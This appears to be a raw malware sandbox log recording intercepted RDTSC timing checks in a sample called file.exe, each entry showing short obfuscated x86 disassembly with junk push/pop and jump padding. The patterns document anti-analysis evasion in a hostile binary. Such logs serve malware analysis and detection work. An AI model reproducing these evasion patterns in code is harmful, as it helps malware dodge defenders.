Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630164 second address: 63016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63016C second address: 630170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 630445 second address: 630449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354B2 second address: 6354B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354B8 second address: 6354C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354C1 second address: 6354E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F40B515FC09h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6354E0 second address: 6354E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 644627 second address: 644639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 642433 second address: 64243D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64243D second address: 642441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650337 second address: 650343 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 650343 second address: 650347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6539A1 second address: 6539A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6539A7 second address: 6539AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6553A0 second address: 6553A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6553A5 second address: 6553BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F40B515FBF6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E039 second address: 66E041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E041 second address: 66E045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E045 second address: 66E049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E882 second address: 66E888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EB29 second address: 66EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F40B477E786h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EB36 second address: 66EB41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F40B515FBF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6706A0 second address: 6706BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F40B477E786h 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F40B477E786h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6706BF second address: 6706DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC08h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673082 second address: 673086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673086 second address: 6730A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F40B515FC00h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673145 second address: 673149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 673149 second address: 673166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733E3 second address: 6733E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733E9 second address: 6733ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733ED second address: 6733F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6733F1 second address: 673403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F40B515FBFEh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6768D9 second address: 6768F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F40B477E786h 0x00000009 pop edx 0x0000000a jmp 00007F40B477E78Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450387 second address: 5450399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450399 second address: 545039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545039F second address: 54503A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54503A3 second address: 5450421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F40B477E78Ch 0x00000013 jmp 00007F40B477E795h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F40B477E793h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F40B477E794h 0x0000002e add ax, 0178h 0x00000033 jmp 00007F40B477E78Bh 0x00000038 popfd 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450421 second address: 5450468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B515FC04h 0x0000000a sbb ecx, 35419BD8h 0x00000010 jmp 00007F40B515FBFBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov ecx, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F40B515FC05h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54803F0 second address: 548042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F40B477E791h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B477E78Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548042F second address: 5480493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F40B515FC02h 0x00000019 push eax 0x0000001a jmp 00007F40B515FBFBh 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F40B515FC02h 0x00000029 xor ch, FFFFFFA8h 0x0000002c jmp 00007F40B515FBFBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480542 second address: 5480546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480546 second address: 548054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548054C second address: 5480582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F40B477E794h 0x0000000b and ax, 9BB8h 0x00000010 jmp 00007F40B477E78Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480582 second address: 5480586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480586 second address: 548058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54805E1 second address: 54805EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C916h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54805EA second address: 548065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov si, di 0x0000000d pushfd 0x0000000e jmp 00007F40B477E795h 0x00000013 add ecx, 6E148A76h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 pop esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F40B477E78Ch 0x00000028 add esi, 1BF01F98h 0x0000002e jmp 00007F40B477E78Bh 0x00000033 popfd 0x00000034 mov dl, cl 0x00000036 popad 0x00000037 leave 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F40B477E78Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548065B second address: 547005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F40B515FBF7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F40BA219033h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F40B515FC03h 0x0000003b xor ecx, 6EAA7FAEh 0x00000041 jmp 00007F40B515FC09h 0x00000046 popfd 0x00000047 movzx ecx, bx 0x0000004a popad 0x0000004b push edx 0x0000004c jmp 00007F40B515FC08h 0x00000051 mov dword ptr [esp], ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547005D second address: 5470061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470061 second address: 5470067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470067 second address: 547006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547006D second address: 5470092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FC09h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470092 second address: 5470114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007F40B477E793h 0x00000013 adc ah, FFFFFFDEh 0x00000016 jmp 00007F40B477E799h 0x0000001b popfd 0x0000001c pop eax 0x0000001d popad 0x0000001e push 0EE7BC56h 0x00000023 jmp 00007F40B477E798h 0x00000028 add dword ptr [esp], 66DEE1F2h 0x0000002f pushad 0x00000030 jmp 00007F40B477E78Eh 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470114 second address: 5470125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 212B886Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470125 second address: 5470129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470129 second address: 547012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547012F second address: 5470135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470135 second address: 5470139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470139 second address: 54701B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5495A302h 0x0000000f jmp 00007F40B477E792h 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007F40B477E790h 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push esi 0x00000027 movsx ebx, ax 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F40B477E78Bh 0x00000038 adc ch, 0000006Eh 0x0000003b jmp 00007F40B477E799h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54701B6 second address: 54701F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F40B515FBFEh 0x0000000f sub esp, 18h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F40B515FC07h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54701F6 second address: 54702BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov bx, 163Eh 0x00000010 pop edi 0x00000011 jmp 00007F40B477E794h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F40B477E78Bh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F40B477E794h 0x00000025 and ax, 4268h 0x0000002a jmp 00007F40B477E78Bh 0x0000002f popfd 0x00000030 call 00007F40B477E798h 0x00000035 mov si, F961h 0x00000039 pop eax 0x0000003a popad 0x0000003b push ebx 0x0000003c pushad 0x0000003d push esi 0x0000003e mov al, dl 0x00000040 pop ecx 0x00000041 pushfd 0x00000042 jmp 00007F40B477E791h 0x00000047 adc ecx, 2B6125E6h 0x0000004d jmp 00007F40B477E791h 0x00000052 popfd 0x00000053 popad 0x00000054 mov dword ptr [esp], esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702BC second address: 54702C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702C0 second address: 54702C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702C4 second address: 54702CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702CA second address: 54702D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D0 second address: 54702D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D4 second address: 54702D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D8 second address: 5470300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F40B515FC05h 0x00000011 pop ecx 0x00000012 mov edx, 7C5E9E94h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470300 second address: 5470306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470306 second address: 547030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547030A second address: 5470343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 1FFE8673h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F40B477E792h 0x0000001a or ecx, 4159C978h 0x00000020 jmp 00007F40B477E78Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470343 second address: 54703C0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 5C6228AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [75C74538h] 0x0000000f jmp 00007F40B515FC01h 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F40B515FC03h 0x00000020 adc esi, 0AA3F69Eh 0x00000026 jmp 00007F40B515FC09h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F40B515FC00h 0x00000032 xor ax, A898h 0x00000037 jmp 00007F40B515FBFBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703C0 second address: 5470411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F40B477E794h 0x00000014 sbb cl, 00000028h 0x00000017 jmp 00007F40B477E78Bh 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f jmp 00007F40B477E796h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470411 second address: 547042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547042D second address: 5470433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470433 second address: 547044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, 478Ah 0x0000000e movsx edx, ax 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547044E second address: 547045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547045D second address: 5470475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470475 second address: 54704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 jmp 00007F40B477E796h 0x00000016 mov dword ptr [ebp-18h], esp 0x00000019 jmp 00007F40B477E790h 0x0000001e mov eax, dword ptr fs:[00000018h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E797h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54704D4 second address: 547050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007F40B515FBFEh 0x00000014 test ecx, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547050D second address: 5470511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470511 second address: 5470515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470515 second address: 547051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547051B second address: 5470520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470520 second address: 5470526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
